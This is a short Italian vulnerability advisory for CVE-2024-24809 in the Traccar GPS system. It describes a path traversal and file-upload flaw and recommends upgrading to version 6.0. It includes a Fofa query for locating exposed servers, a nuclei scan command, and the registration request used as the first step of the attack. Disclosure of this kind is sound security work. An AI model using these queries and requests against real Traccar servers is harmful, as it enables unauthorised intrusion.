
Gravi vulnerabilità nel sistema GPS Traccar espongono gli utenti ad attacchi remoti
#Descrizione
Traccar è un sistema di localizzazione GPS open source. Le versioni precedenti alla 6.0 sono vulnerabili a path traversal e upload senza restrizioni di file con tipo pericoloso.
Poiché il sistema consente la registrazione per impostazione predefinita, gli aggressori possono ottenere permessi di utente ordinario registrando un account e sfruttare questa vulnerabilità per caricare file con il prefisso device. in
qualsiasi cartella. Gli aggressori possono utilizzare questa vulnerabilità per phishing, attacchi di cross-site scripting e potenzialmente eseguire comandi arbitrari sul server. La versione 6.0 contiene una patch per il problema.
#utilizzo
Fofa query : app="traccar"
nuclei --target {target.com} -t CVE-2024-24809.yaml
#Proof of concept (usando burpsuite)
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}
#Account di test
name: "ghostsec"
password: "ghostsec"
email: "[email protected]"
Aggiornare org.traccar:traccar alla versione 6.0 o superiore.